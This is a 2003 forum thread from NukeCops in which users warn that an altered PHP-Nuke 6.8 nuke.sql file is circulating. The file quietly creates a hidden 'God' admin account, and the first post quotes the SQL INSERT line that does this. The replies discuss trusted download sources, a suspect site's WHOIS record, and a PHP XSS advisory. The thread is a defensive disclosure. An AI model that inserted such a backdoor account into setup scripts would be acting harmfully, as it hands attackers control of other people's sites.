You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 319 guest(s) and 0 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Alert - Altered nuke.sql file being circulated gives admin [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
SpankedMonkey
Nuke Soldier
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19


PostPosted: Sun Jul 20, 2003 3:34 pm Reply with quoteBack to top

I downloaded a copy of nuke 6.8 on monday, after installing it on my site and loading the database I was unable to create an admin account. A very nice nukecop staff member offered to debug it and found that I had already created an account name aaa. Now this happened on 2 other databases that I loaded and I know I didn't create an account by accident 3 times, so I checked the other DB's and found they too had a GOD account created as aaa. Now, I decided to act on a hunch and search the nuke.sql for aaa.

I found this:

Code:
 INSERT INTO nuke_authors VALUES ( 'aaa', 'God', 'http://a', 'a', '0cc175b9c0f1b6a831c399e269772661', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '0', '1', '');



I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.

So all I can say is be very careful where you get your downloads and be aware that this is in circulation.
Find all posts by SpankedMonkeyView user's profileSend private message
chatserv
General
General


Joined: Jan 12, 2003
Posts: 3128

Location: Puerto Rico

PostPosted: Sun Jul 20, 2003 5:53 pm Reply with quoteBack to top

Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

_________________
Feed a man a fish and you feed him for a day. Teach a man to fish and you feed him for a lifetime.
ScriptHeaven | NukeResources
Find all posts by chatservView user's profileSend private messageVisit poster's website
Raven
General
General


Joined: Mar 22, 2003
Posts: 5233

Location: USA

PostPosted: Sun Jul 20, 2003 6:03 pm Reply with quoteBack to top

Interesting turn of events, isn't it. The question is hotly debated as to what $10 will buy you. Hmmm.

_________________
Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff
Find all posts by RavenView user's profileSend private messageVisit poster's website
MikeMiles
Lieutenant
Lieutenant


Joined: May 29, 2003
Posts: 231


PostPosted: Mon Jul 21, 2003 1:02 am Reply with quoteBack to top

chatserv wrote:
Might be a good chance to add that files that deal with the database or replace core Nuke files should only be downloaded from established websites and from well known authors.

Even then you have to be on your guard. I came across one of the established Nuke sites advertising a hacker's security fix on their front page which you all caught as bogus. I had to tell them to remove it. I won't post which one it was, but I'll say many sites just don't check things out.
Find all posts by MikeMilesView user's profileSend private message
ulissesnelson
Lieutenant
Lieutenant


Joined: Apr 09, 2003
Posts: 188


PostPosted: Mon Jul 21, 2003 2:50 am Reply with quoteBack to top

iD LIKE by first Job..(site almost ready,waiting mikem answer ) Get NUKE REPORT into the patrol of (unficial) Nuke Sites.

and my sugestion its,why the nuke files can be only autorized to be downloaded from official nuke sites
like nuke cops,phpnuke ,we can created a standart image,sayng that its a secure web site...
what u think?

_________________
Were You Go Today? <b>NuKe Report </b> ill Help you
Find all posts by ulissesnelsonView user's profileSend private message
luchtzak
Support Mod
Support Mod


Joined: Mar 19, 2003
Posts: 308


PostPosted: Mon Jul 21, 2003 2:52 am Reply with quoteBack to top

I allready had a phpnuke 6.7 version and in the sql-file they had added a link to their website so you would get:

Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license

URL of that website

Be carefull what you download! I think it can be easy to install something on it to track your website etc...

_________________
Luchtzak Aviation - Snookerforum Belgium
Find all posts by luchtzakView user's profileSend private messageVisit poster's website
foxyfemfem
Support Staff
Support Staff


Joined: Jan 23, 2003
Posts: 668

Location: USA

PostPosted: Mon Jul 21, 2003 3:09 am Reply with quoteBack to top

Hello,

Quoting the Security Alert Message on the mainpage
Quote:
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.


Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?
Find all posts by foxyfemfemView user's profileSend private message
MikeMiles
Lieutenant
Lieutenant


Joined: May 29, 2003
Posts: 231


PostPosted: Mon Jul 21, 2003 3:51 am Reply with quoteBack to top

Quote:
Did I miss something here?


Apparently so. The FAQ is a word-for-word rip off from the main site. Like you I don't see any link for downloading, but it could have been changed or maybe the wrong URL was posted.

Anyway, this is the registration of the site you think is legit looking. Missing a few details wouldn't you say?

WhoIs Results for nukephp.org

Contact Type Registrant
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Administrative
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Billing
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Contact Type Technical
Organization Name: n/a
First Name: Steven
Last Name: Richard
Address 1: n/a
Address 2:
City: n/a
StateProvince: NA
PostalCode: n/a
Country: FR
Phone: n/a
Fax: n/a
EmailAddress:

Other Information
created-by: 5065-EN
created-date:
nameserver: dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

registrar: 5065-EN
registration-expiration-date:
status:
updated-by: 5065-EN
updated-date:
Find all posts by MikeMilesView user's profileSend private message
Raven
General
General


Joined: Mar 22, 2003
Posts: 5233

Location: USA

PostPosted: Mon Jul 21, 2003 3:59 am Reply with quoteBack to top

foxyfemfem wrote:
Hello,

Quoting the Security Alert Message on the mainpage
Quote:
He inspected the nuke.sql file from his v6.8 distro and the INSERT statement to nuke_authors came preinstalled (thank you very much ) with a user 'aaa' and a password that of course was MD5'd! He said he got the v6.8 from a link on nukephp.org.


Out of curiousity I visited nukephp.org website. The website appear to be legit (mho). The FAQ (where to download phpnuke) has a link to phpnuke.org website. After reading the FAQ I can only assume he downloaded the program from the "official website" phpnuke.org.

Did I miss something here?

You cannot download v6.8 from phpnuke.org without being a member of the Club, so he did not d/l it from there.

_________________
Those who hear not the music think the dancers mad.
Raven Web Hosting|My Scripts & Stuff
Find all posts by RavenView user's profileSend private messageVisit poster's website
SpankedMonkey
Nuke Soldier
Nuke Soldier


Joined: Jul 17, 2003
Posts: 19


PostPosted: Mon Jul 21, 2003 6:46 am Reply with quoteBack to top

As I said above:

Quote:
I really wish I could remember which site I got it from but I know I didn't need to reg and I cleared my browsers cache on wednesday so I have nothing to track.



I want to say that I did get it from a link off of nukephp.org but I can not be sure, I thought I did. The link said that it required no registration also.

When I get home from work, I will see if there is anything else I can do to see where I got the download.
Find all posts by SpankedMonkeyView user's profileSend private message
Zhen-Xjell
Nuke Cops Founder
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939


PostPosted: Mon Jul 21, 2003 6:50 am Reply with quoteBack to top

Running analzyer will show you who the admins are of php-nuke and the phpbb2 forums. You can, as I often do, run it for a quick visual check of any changes.

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
Find all posts by Zhen-XjellView user's profileSend private messageSend e-mailVisit poster's website
Stylee
Sergeant
Sergeant


Joined: Jun 22, 2003
Posts: 140

Location: USA

PostPosted: Tue Jul 22, 2003 4:56 pm Reply with quoteBack to top

Where do you get the analyzer from?
Find all posts by StyleeView user's profileSend private messageSend e-mailVisit poster's website
Zhen-Xjell
Nuke Cops Founder
Nuke Cops Founder


Joined: Nov 14, 2002
Posts: 5939


PostPosted: Tue Jul 22, 2003 5:33 pm Reply with quoteBack to top

Hi, right on our front page.

_________________
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops: [de] [en] [wiki]
Find all posts by Zhen-XjellView user's profileSend private messageSend e-mailVisit poster's website
Stylee
Sergeant
Sergeant


Joined: Jun 22, 2003
Posts: 140

Location: USA

PostPosted: Tue Jul 22, 2003 6:46 pm Reply with quoteBack to top

Thank you.
Find all posts by StyleeView user's profileSend private messageSend e-mailVisit poster's website
Stylee
Sergeant
Sergeant


Joined: Jun 22, 2003
Posts: 140

Location: USA

PostPosted: Tue Jul 22, 2003 7:46 pm Reply with quoteBack to top

Ok, I got warnings big time, I was able to fix alot of them simply. but this is the part that I am not sure about.

I got this
-------
WARNING! WARNING! WARNING! Vulnerable PHP On Your Server!
PHP Version Reason For Vulnerability
4.3.1 Your Server may be vulnerable to Cross-site Scripting in PHP's Transparent Session ID Support. Versions prior to 4.3.2 are affected. Tell your host to read the SecurityFocus report by clicking --> here. Until that is resolved, PHP-Nuke should be the least of your worries.

AFFECTED VERSIONS: Constraints
4.3.0 and 4.3.1 with php.ini containing session.use_trans_sid=1
4.2.0 to 4.2.3 without php.ini, or with php.ini containing session.use_trans_sid=1(php.ini-dist and php.ini-recommended from the PHP source distribution had use_trans_sid=1 from 4.2.0 to 4.2.2, and use_trans_sid=0 for 4.2.3 and later versions.)
prior to 4.2.0 compiled with --enable-trans-sid and with session.use_trans_sid=1

FIXED VERSIONS: Suggestion
4.3.2 or later Backup your system and upgrade PHP, also read the article at SecurityFocus. Solution 1 from Security Focus: Click, Solution 2 from thathost: Click. Solution 1 suggests the use of mod_security, which is an Apache module discussed at Nuke Cops: Here

Does this meant that this will be resolved if I update to nule 4.3.2?
How do I tell what version that I am on. I am using PHPNuke 6.7
Find all posts by StyleeView user's profileSend private messageSend e-mailVisit poster's website
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.043 Seconds - 252 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::